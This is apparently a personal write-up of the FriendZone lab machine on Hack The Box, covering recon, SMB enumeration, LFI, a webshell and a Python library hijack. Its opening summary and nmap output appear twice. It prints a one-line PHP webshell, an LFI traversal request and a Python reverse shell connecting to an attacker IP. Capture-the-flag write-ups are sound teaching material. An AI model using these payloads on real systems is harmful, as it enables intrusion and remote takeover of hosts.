This post covers my process for solving the FriendZone box on Hack The Box. It demonstrates a typical CTF methodology: recon, enumeration, exploitation (web and SMB), privilege escalation via Python library hijacking, and lessons learned.

References

Recon

NMAP Scan

└──╼ [★]$ nmap -sC -sV 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 15:01 CDT
Nmap scan report for 10.10.10.123
Host is up (0.011s latency).
Not shown: 993 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-07-03T20:02:08
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2025-07-03T23:02:09+03:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.29 seconds

title: FriendZone HTB Walkthrough date: 2025-07-03 categories: [Penetration Testing, CTF Walkthrough, Privilege Escalation, Web Application Security] tags: [HTB, FriendZone, SMB, LFI, privilege escalation, python hijack, reverse shell, DNS, enumeration]

This post covers my process for solving the FriendZone box on Hack The Box. It demonstrates a typical CTF methodology: recon, enumeration, exploitation (web and SMB), privilege escalation via Python library hijacking, and lessons learned.

References

Recon

NMAP Scan

└──╼ [★]$ nmap -sC -sV 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 15:01 CDT
Nmap scan report for 10.10.10.123
Host is up (0.011s latency).
Not shown: 993 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-07-03T20:02:08
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2025-07-03T23:02:09+03:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.29 seconds

Key findings:

  • Open ports: 21 (FTP), 22 (SSH), 53 (DNS), 80/443 (HTTP/S), 139/445 (SMB/Samba)
  • Notable: FTP, DNS, and multiple SMB shares

Feroxbuster

feroxbuster -u http://10.10.10.123
  • Found /wordpress (301), /fz.jpg (200), etc.
  • Possible Wordpress site, Apache, Ubuntu

DNS Note:
Found CN friendzone.red — zone transfer possible.

Attacks & Enumeration

DNS (Port 53)

Tried AXFR on friendzone.red — nothing interesting.
Missed friendzoneportal.red initially (learned from 0xdf’s writeup).

SMB/Samba Enumeration (Port 139/445)

smbclient -L //10.10.10.123/ -N

Found general, Development, and other shares.
Accessed general share and found creds.txt:

admin:WORKWORKHhallelujah@#

Tried credentials on SSH, FTP, and SMB shares (only Development was accessible, but empty).

Web (443 / Virtual Hosts)

  • HTTPS site is mostly empty, but /js/js/ gives a base64-ish string.
  • Looked for hidden endpoints, found /admin, /wordpress (empty), /js (interesting).
  • Login at administrator1.friendzone.red using the creds works and leads to /dashboard.php.

LFI via pagename Param

dashboard.php revealed possible Local File Inclusion (LFI) via pagename param:

dashboard.php?image_id=a.jpg&pagename=timestamp
  • Confirmed LFI by including ../uploads/upload.

Getting Source Code

Used PHP filters (and LFI) to read source code for dashboard.php, login.php, and upload.php.

Uploading Webshell via SMB

Uploaded a webshell to the Development share:

<?php system($_REQUEST["cmd"]); ?>

Triggered the webshell via LFI:

dashboard.php?image_id=a.jpg&pagename=../../../etc/Development/test&cmd=id
  • Note: cmd=id works as a parameter to the uploaded webshell.

Privilege Escalation

  • Found MySQL credentials: 
    db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
  • Used creds to escalate to local user friend.
  • Used pspy to find root running /opt/server_admin/reporter.py (which imports os).
  • Python library hijack:
    Modified /usr/lib/python2.7/os.py to include a reverse shell payload.
    Waited for cron to trigger and got root shell.
import pty
import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",443))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()

Lessons Learned

  • Always enumerate all DNS and virtual hosts; CTFs hide clues everywhere.
  • LFI and file upload vulnerabilities can be chained for RCE.
  • Privilege escalation often involves writable scripts or modules; watch for Python hijacks.
  • Tools like pspy are invaluable for watching root-level cronjobs and processes.

Writeup based on my own exploitation process, with inspiration from community writeups.